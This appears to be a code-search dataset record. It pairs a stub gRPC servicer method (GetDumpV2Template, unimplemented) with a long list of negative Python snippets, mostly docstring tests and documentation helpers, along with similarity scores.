self.assertTrue(len(__import__('6-max_integer').__doc__) > 0)", "def test_docstring(self):\n self.assertTrue(len(City.__doc__) > 1)\n self.assertTrue(len(City.__init__.__doc__) > 1)\n self.assertTrue(len(City.__str__.__doc__) > 1)\n self.assertTrue(len(City.save.__doc__) > 1)\n self.assertTrue(len(City.to_dict.__doc__) > 1)", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def test_docstring(self):\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)", "def fini_doc(self):\n raise NotImplementedError()", "def test_doc():\n pass", "def test_module_doc(self):\n self.assertTrue(len(user.__doc__) > 0)", "def lispdoc(self, irc, msg, args, num, req):\n self.googleq('http://lispdoc.com/', req, num, irc)", "def test_module_doc(self):\n self.assertTrue(len(models.amenity.__doc__) > 0)", "def bus_func_doc(self, bus):\n return None", "def test_doc2(self):\n assert Review.__doc__ is not None", "def c_comment(self, token: Token):\n if token.value.startswith(\"/**\"):\n self.doc_comments.append(PrefixCppDocComment(token))", "def test_module_doc(self):\n self.assertTrue(len(State.__doc__) > 0)", "def test_module_doc(self):\n self.assertTrue(len(db_storage.__doc__) > 0)", "def test_BaseModel_cls_doc(self):\n self.assertIsNotNone(BaseModel.__doc__)", "def doc_string():\n pass # pass does nothing", "def test_docstrings(self):\n self.assertEqual(len(Rectangle.__doc__) > 0, True)\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def test_documentation(self):\n doc = City.__doc__\n self.assertGreaterEqual(len(doc), 1)", "def test_Userdoc(self):\n self.assertNotEqual(len(User.__doc__), 0)", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def test_module_doc(self):\n self.assertTrue(len(city.__doc__) > 0)", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def test_BaseModel_methods_doc(self):\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)", "def javadoc(self, irc, msg, args, num, req):\n self.googleq('download.oracle.com/javase/6/docs/', req, num, irc)", "def implement(self):\n\t#@DEBUG remove comments", "def magic_pdoc(self, parameter_s=''):\n self._inspect('pdoc',parameter_s)", "def dummy(doc):\r\n return doc", "def _add_doc(func, doc):\n func.__doc__ = doc", "def test_proto_spec(self):\n proto_name = 'org.xlattice.upax'\n node_reg = reg.NodeReg()\n proto_reg = reg.ProtoReg(proto_name, node_reg)\n msg_reg = reg.MsgReg(proto_reg)\n proto_spec = M.ProtoSpec(proto_name, proto_reg)\n self.assertEqual(proto_name, proto_spec.name)\n parent = M.ProtoSpec(proto_name, proto_reg)\n\n msg_name = 'logEntry'\n # the enum is not used\n enum = M.EnumSpec.create('Joe', [\n ('oh', 92), ('hello', 47), ('there', 322), ])\n fields = [\n # pylint: disable=no-member\n M.FieldSpec(\n msg_reg,\n 'timestamp',\n FieldTypes.F_UINT32,\n Quants.REQUIRED,\n 0),\n M.FieldSpec(\n msg_reg,\n 'node_id',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 1),\n M.FieldSpec(\n msg_reg,\n 'key',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 2),\n M.FieldSpec(\n msg_reg,\n 'length',\n FieldTypes.V_UINT32,\n Quants.REQUIRED,\n 3),\n M.FieldSpec(\n msg_reg,\n 'by_',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 4),\n M.FieldSpec(\n msg_reg,\n 'path',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 5),\n ]\n msg_spec = M.MsgSpec(msg_name, msg_reg, proto_spec)\n self.assertEqual(msg_name, msg_spec.name)\n for file in fields:\n msg_spec.add_field(file)\n\n # proto_spec.add_msg(msg_spec) # correctly commented out\n self.round_trip_poto_spec_via_string(proto_spec) # GEEP", "def test_student_class_docstring(self):\n self.assertIsNot(Student.__doc__, None,\n \"Student class needs a docstring\")\n self.assertTrue(len(Student.__doc__) >= 1,\n \"Student class needs a docstring\")", "def main_docstring():", "def test_docstring(self):\n self.assertTrue(len(FileStorage.__doc__) > 1)\n self.assertTrue(len(FileStorage.all.__doc__) > 1)\n self.assertTrue(len(FileStorage.new.__doc__) > 1)\n self.assertTrue(len(FileStorage.save.__doc__) > 1)\n self.assertTrue(len(FileStorage.reload.__doc__) > 1)", "def describe(self):\n return \"The method describe() is not implemented\"", "def test_console_documented(self):\n self.assertTrue\n self.assertTrue\n (len(HBNBCommand.__doc__) >= 1)", "def test_class_docstrings(self):\n self.assertGreater(len(self.storage.__doc__), 1)", "def __init__(self, proto):\n self.proto = proto", "def func_doc():", "def get_documentation(self, *args, **dargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def guess(cls, docstring):", "def HandleMissingParameterDoc(self, token, param_name):\n raise TypeError('Abstract method HandleMissingParameterDoc not implemented')", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def docs():", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def test_file_storage_module_docstring(self):\n self.assertIsNot(file_storage.__doc__, None,\n \"file_storage.py needs a docstring\")\n self.assertTrue(len(file_storage.__doc__) >= 1,\n \"file_storage.py needs a docstring\")", "def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:", "def test_doc_file(self):\n expected = 'City class handles all application cities'\n actual = City.__doc__\n self.assertEqual(expected, actual)", "def missed_needed_docstring(self):\n self.needed += 1\n self.missing += 1", "def test_documentation(self):\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def __init__(\n self,\n *,\n public_comment: typing.Optional[str] = None,\n status: typing.Optional[Assignment.Status] = None\n ) -> None:\n ...", "def test_class_doc(self):\n self.assertTrue(len(City.__doc__) > 0)", "def test_doc1(self):\n assert models.review.__doc__ is not None", "def test_doctest(self):\n self.assertTrue(BaseModel.__doc__)\n self.assertTrue(BaseModel.__init__.__doc__)\n self.assertTrue(BaseModel.__str__.__doc__)\n self.assertTrue(BaseModel.save.__doc__)\n self.assertTrue(BaseModel.to_dict.__doc__)", "def should_add_pr_comment(self):\n pass", "def test_findDocumentation(self):\n doc = self.builder._findChanges(\n self.project, self.builder._DOC)\n self.assertEquals(\n doc,\n [(40, 'foo.bar.Baz.quux'),\n (41, 'writing Foo servers')])", "def test_doc_with_comments():\n doc = CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n check_russian_doc(doc)", "def test_method_docs(self):\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def test_state_class_docstring(self):\n self.assertIsNot(State.__doc__, None,\n \"docstring not found in State class\")\n self.assertTrue(len(State.__doc__) >= 1,\n \"docstring not found in State class\")", "def getStructPb2():\n return struct_pb2", "def to_proto(self) -> None:\n\n pass", "def test_doc_string():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(10)\n\n assert len(faker_db.__doc__) > 0 , \"Doc string is missing\"", "def test_swagger_field_is_required():\n raw_schema = RawSchemaFactory()\n raw_schema.pop('swagger', None)\n\n assert 'swagger' not in raw_schema\n\n with pytest.raises(ValidationError) as err:\n swagger_schema_validator(raw_schema)\n\n assert_message_in_errors(\n MESSAGES['required']['required'],\n err.value.detail,\n 'required.swagger',\n )", "def brief_documentation(method: object) -> str:\n doc = method.__doc__\n if doc is not None:\n lines = doc.splitlines()\n if len(lines) > 0:\n return lines[0]\n return ''", "def proto_generation_callable(self):\n raise NotImplementedError()", "def proto_generation_callable(self):\n raise NotImplementedError()", "def document(self):\n ...", "def assert_doc_extensions(doc):\n pass", "def comment():", "def test_doc_module(self):\n from models import user\n\n self.assertTrue(len(user.__doc__) > 0)\n self.assertTrue(len(user.User.__doc__) > 0)", "def test_doc(cls, type_str):\n do_doc_test(cls, type_str)", "def test_docstring(self):\n self.assertIsNotNone(City.__doc__)" ]
[ "0.6348721", "0.6232983", "0.6227791", "0.6107919", "0.6073252", "0.6056996", "0.60199225", "0.5997295", "0.5973073", "0.59475285", "0.59426475", "0.59348774", "0.59195995", "0.59041727", "0.5899058", "0.5865414", "0.5857725", "0.5836395", "0.57917976", "0.57693964", "0.5765628", "0.5738139", "0.5725729", "0.57218313", "0.57099766", "0.5694849", "0.5634908", "0.5631503", "0.562838", "0.5627863", "0.5609239", "0.55800056", "0.5575202", "0.5568366", "0.5556774", "0.554996", "0.55403715", "0.5535095", "0.55324805", "0.55324376", "0.5515471", "0.551169", "0.5499882", "0.54952186", "0.54851204", "0.547969", "0.54744124", "0.5465293", "0.5460546", "0.5460546", "0.5460546", "0.5452012", "0.54468", "0.542486", "0.54212755", "0.5413558", "0.5397512", "0.53957206", "0.53943235", "0.5388301", "0.5376187", "0.5353345", "0.534334", "0.5337087", "0.5336514", "0.53339815", "0.5328619", "0.53255814", "0.53247285", "0.5322686", "0.5319762", "0.53191066", "0.53140306", "0.53077936", "0.5279659", "0.5267621", "0.5264218", "0.5252085", "0.5219406", "0.5217774", "0.5214222", "0.5213382", "0.52094376", "0.52063346", "0.5204785", "0.5193972", "0.5189197", "0.51867706", "0.5182037", "0.51802737", "0.5177115", "0.5172607", "0.5164527", "0.51625025", "0.51625025", "0.5162299", "0.5160613", "0.5157092", "0.51471317", "0.5142684", "0.51393735" ]
0.0
-1
Missing associated documentation comment in .proto file.
def GetDumpV2Template(self, request, context): context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_doc(self):\n raise NotImplementedError()", "def inherits_doc():\n pass", "def documentation_only():\n pass", "def DocString():\n return", "def test_module_doc(self):\n self.assertTrue(len(base.__doc__) > 0)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def cppdoc(self, irc, msg, args, num, req):\n self.googleq('www.cplusplus.com/reference/', req, num, irc)", "def testDocstring(self):\n class NotImportant(messages.Enum):\n \"\"\"I have a docstring.\"\"\"\n\n VALUE1 = 1\n\n self.assertEquals('I have a docstring.', NotImportant.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(base_model.__doc__) > 0)", "def phpdoc(self, irc, msg, args, num, req):\n self.googleq('http://php.net/manual/en/', req, num, irc)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def docstring_hack():\n pass", "def check_documentation(self):\n\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(__init__.__doc__)\n self.assertIsNotNone(__str__.__doc__)\n self.assertIsNotNone(save.__doc__)\n self.assertIsNotNone(to_dict.__doc__)", "def consistent_documentation():\n\n return 3", "def test_init_doc(self):\n self.assertTrue(\n len(Review.__init__.__doc__) > 10\n )", "def test_missing_docstring(a, b): # noqa: D213, D407", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def test_docstring(self):\n self.assertTrue(len(BaseModel.__doc__) > 1)\n self.assertTrue(len(BaseModel.__init__.__doc__) > 1)\n self.assertTrue(len(BaseModel.__str__.__doc__) > 1)\n self.assertTrue(len(BaseModel.save.__doc__) > 1)\n self.assertTrue(len(BaseModel.to_dict.__doc__) > 1)", "def __doc__(self, ???):", "def test_class_doc(self):\n self.assertTrue(\n len(Review.__doc__) > 10\n )", "def test_module_doc(self):\n self.assertTrue(len(amenity.__doc__) > 0)", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(r.__doc__) > 10)", "def test_docstring(self):\n self.assertIsNotNone(Place.__doc__)", "def test_documentation(self):\n self.assertTrue(hasattr(Base, \"__init__\"))\n self.assertTrue(hasattr(Base, \"create\"))\n self.assertTrue(hasattr(Base, \"to_json_string\"))\n self.assertTrue(hasattr(Base, \"from_json_string\"))\n self.assertTrue(hasattr(Base, \"save_to_file\"))\n self.assertTrue(hasattr(Base, \"load_from_file\"))\n self.assertTrue(Base.__init__.__doc__)\n self.assertTrue(Base.create.__doc__)\n self.assertTrue(Base.to_json_string.__doc__)\n self.assertTrue(Base.from_json_string.__doc__)\n self.assertTrue(Base.save_to_file.__doc__)\n self.assertTrue(Base.load_from_file.__doc__)", "def has_doc() -> None:", "def test_doc(self):\n self.assertTrue(len(max_integer.__doc__) > 0)\n self.assertTrue(len(__import__('6-max_integer').__doc__) > 0)", "def test_docstring(self):\n self.assertTrue(len(City.__doc__) > 1)\n self.assertTrue(len(City.__init__.__doc__) > 1)\n self.assertTrue(len(City.__str__.__doc__) > 1)\n self.assertTrue(len(City.save.__doc__) > 1)\n self.assertTrue(len(City.to_dict.__doc__) > 1)", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def test_docstring(self):\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)", "def fini_doc(self):\n raise NotImplementedError()", "def test_doc():\n pass", "def test_module_doc(self):\n self.assertTrue(len(user.__doc__) > 0)", "def lispdoc(self, irc, msg, args, num, req):\n self.googleq('http://lispdoc.com/', req, num, irc)", "def test_module_doc(self):\n self.assertTrue(len(models.amenity.__doc__) > 0)", "def bus_func_doc(self, bus):\n return None", "def test_doc2(self):\n assert Review.__doc__ is not None", "def c_comment(self, token: Token):\n if token.value.startswith(\"/**\"):\n self.doc_comments.append(PrefixCppDocComment(token))", "def test_module_doc(self):\n self.assertTrue(len(State.__doc__) > 0)", "def test_module_doc(self):\n self.assertTrue(len(db_storage.__doc__) > 0)", "def test_BaseModel_cls_doc(self):\n self.assertIsNotNone(BaseModel.__doc__)", "def doc_string():\n pass # pass does nothing", "def test_docstrings(self):\n self.assertEqual(len(Rectangle.__doc__) > 0, True)\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def test_documentation(self):\n doc = City.__doc__\n self.assertGreaterEqual(len(doc), 1)", "def test_Userdoc(self):\n self.assertNotEqual(len(User.__doc__), 0)", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def test_module_doc(self):\n self.assertTrue(len(city.__doc__) > 0)", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def test_BaseModel_methods_doc(self):\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)", "def javadoc(self, irc, msg, args, num, req):\n self.googleq('download.oracle.com/javase/6/docs/', req, num, irc)", "def implement(self):\n\t#@DEBUG remove comments", "def magic_pdoc(self, parameter_s=''):\n self._inspect('pdoc',parameter_s)", "def dummy(doc):\r\n return doc", "def test_proto_spec(self):\n proto_name = 'org.xlattice.upax'\n node_reg = reg.NodeReg()\n proto_reg = reg.ProtoReg(proto_name, node_reg)\n msg_reg = reg.MsgReg(proto_reg)\n proto_spec = M.ProtoSpec(proto_name, proto_reg)\n self.assertEqual(proto_name, proto_spec.name)\n parent = M.ProtoSpec(proto_name, proto_reg)\n\n msg_name = 'logEntry'\n # the enum is not used\n enum = M.EnumSpec.create('Joe', [\n ('oh', 92), ('hello', 47), ('there', 322), ])\n fields = [\n # pylint: disable=no-member\n M.FieldSpec(\n msg_reg,\n 'timestamp',\n FieldTypes.F_UINT32,\n Quants.REQUIRED,\n 0),\n M.FieldSpec(\n msg_reg,\n 'node_id',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 1),\n M.FieldSpec(\n msg_reg,\n 'key',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 2),\n M.FieldSpec(\n msg_reg,\n 'length',\n FieldTypes.V_UINT32,\n Quants.REQUIRED,\n 3),\n M.FieldSpec(\n msg_reg,\n 'by_',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 4),\n M.FieldSpec(\n msg_reg,\n 'path',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 5),\n ]\n msg_spec = M.MsgSpec(msg_name, msg_reg, proto_spec)\n self.assertEqual(msg_name, msg_spec.name)\n for file in fields:\n msg_spec.add_field(file)\n\n # proto_spec.add_msg(msg_spec) # correctly commented out\n self.round_trip_poto_spec_via_string(proto_spec) # GEEP", "def _add_doc(func, doc):\n func.__doc__ = doc", "def test_student_class_docstring(self):\n self.assertIsNot(Student.__doc__, None,\n \"Student class needs a docstring\")\n self.assertTrue(len(Student.__doc__) >= 1,\n \"Student class needs a docstring\")", "def main_docstring():", "def test_docstring(self):\n self.assertTrue(len(FileStorage.__doc__) > 1)\n self.assertTrue(len(FileStorage.all.__doc__) > 1)\n self.assertTrue(len(FileStorage.new.__doc__) > 1)\n self.assertTrue(len(FileStorage.save.__doc__) > 1)\n self.assertTrue(len(FileStorage.reload.__doc__) > 1)", "def describe(self):\n return \"The method describe() is not implemented\"", "def test_console_documented(self):\n self.assertTrue\n self.assertTrue\n (len(HBNBCommand.__doc__) >= 1)", "def __init__(self, proto):\n self.proto = proto", "def test_class_docstrings(self):\n self.assertGreater(len(self.storage.__doc__), 1)", "def func_doc():", "def get_documentation(self, *args, **dargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def guess(cls, docstring):", "def HandleMissingParameterDoc(self, token, param_name):\n raise TypeError('Abstract method HandleMissingParameterDoc not implemented')", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def docs():", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def test_file_storage_module_docstring(self):\n self.assertIsNot(file_storage.__doc__, None,\n \"file_storage.py needs a docstring\")\n self.assertTrue(len(file_storage.__doc__) >= 1,\n \"file_storage.py needs a docstring\")", "def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:", "def test_doc_file(self):\n expected = 'City class handles all application cities'\n actual = City.__doc__\n self.assertEqual(expected, actual)", "def missed_needed_docstring(self):\n self.needed += 1\n self.missing += 1", "def test_documentation(self):\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def __init__(\n self,\n *,\n public_comment: typing.Optional[str] = None,\n status: typing.Optional[Assignment.Status] = None\n ) -> None:\n ...", "def test_class_doc(self):\n self.assertTrue(len(City.__doc__) > 0)", "def test_doc1(self):\n assert models.review.__doc__ is not None", "def test_doctest(self):\n self.assertTrue(BaseModel.__doc__)\n self.assertTrue(BaseModel.__init__.__doc__)\n self.assertTrue(BaseModel.__str__.__doc__)\n self.assertTrue(BaseModel.save.__doc__)\n self.assertTrue(BaseModel.to_dict.__doc__)", "def should_add_pr_comment(self):\n pass", "def test_findDocumentation(self):\n doc = self.builder._findChanges(\n self.project, self.builder._DOC)\n self.assertEquals(\n doc,\n [(40, 'foo.bar.Baz.quux'),\n (41, 'writing Foo servers')])", "def test_doc_with_comments():\n doc = CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n check_russian_doc(doc)", "def test_method_docs(self):\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def test_state_class_docstring(self):\n self.assertIsNot(State.__doc__, None,\n \"docstring not found in State class\")\n self.assertTrue(len(State.__doc__) >= 1,\n \"docstring not found in State class\")", "def getStructPb2():\n return struct_pb2", "def to_proto(self) -> None:\n\n pass", "def test_doc_string():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(10)\n\n assert len(faker_db.__doc__) > 0 , \"Doc string is missing\"", "def test_swagger_field_is_required():\n raw_schema = RawSchemaFactory()\n raw_schema.pop('swagger', None)\n\n assert 'swagger' not in raw_schema\n\n with pytest.raises(ValidationError) as err:\n swagger_schema_validator(raw_schema)\n\n assert_message_in_errors(\n MESSAGES['required']['required'],\n err.value.detail,\n 'required.swagger',\n )", "def brief_documentation(method: object) -> str:\n doc = method.__doc__\n if doc is not None:\n lines = doc.splitlines()\n if len(lines) > 0:\n return lines[0]\n return ''", "def proto_generation_callable(self):\n raise NotImplementedError()", "def proto_generation_callable(self):\n raise NotImplementedError()", "def document(self):\n ...", "def assert_doc_extensions(doc):\n pass", "def comment():", "def test_doc_module(self):\n from models import user\n\n self.assertTrue(len(user.__doc__) > 0)\n self.assertTrue(len(user.User.__doc__) > 0)", "def test_doc(cls, type_str):\n do_doc_test(cls, type_str)", "def test_docstring(self):\n self.assertIsNotNone(City.__doc__)" ]
[ "0.6347405", "0.62316597", "0.62253404", "0.6107218", "0.60712713", "0.6055634", "0.60191995", "0.5996731", "0.597168", "0.59466904", "0.59434444", "0.59335643", "0.5919223", "0.5902901", "0.58987755", "0.5864407", "0.5856765", "0.5836615", "0.57913834", "0.57687634", "0.5763714", "0.57372254", "0.5724019", "0.5721367", "0.57097507", "0.5693322", "0.5633919", "0.5631681", "0.5627807", "0.56277686", "0.5608027", "0.55785465", "0.5573401", "0.55674845", "0.55551904", "0.5549059", "0.553947", "0.5534518", "0.5531683", "0.55310714", "0.55151445", "0.55110514", "0.5500249", "0.5493004", "0.548441", "0.5478941", "0.5474353", "0.5463836", "0.5458455", "0.5458455", "0.5458455", "0.5452267", "0.54450864", "0.54251957", "0.5421046", "0.5412398", "0.5397417", "0.5395437", "0.5393102", "0.5386761", "0.53758156", "0.5353344", "0.53435314", "0.5338307", "0.5337008", "0.53325796", "0.53264475", "0.5325588", "0.5324948", "0.5321367", "0.53188294", "0.5317395", "0.5313514", "0.5306335", "0.52826846", "0.526687", "0.5262916", "0.5252228", "0.52204585", "0.52173424", "0.52134776", "0.5213095", "0.5209492", "0.52052844", "0.5204341", "0.51928616", "0.51881623", "0.5186641", "0.51833606", "0.5181922", 